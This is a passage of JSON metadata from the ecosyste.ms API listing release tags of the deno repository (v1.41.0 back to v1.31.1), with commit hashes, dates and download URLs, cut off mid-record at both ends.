cosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fden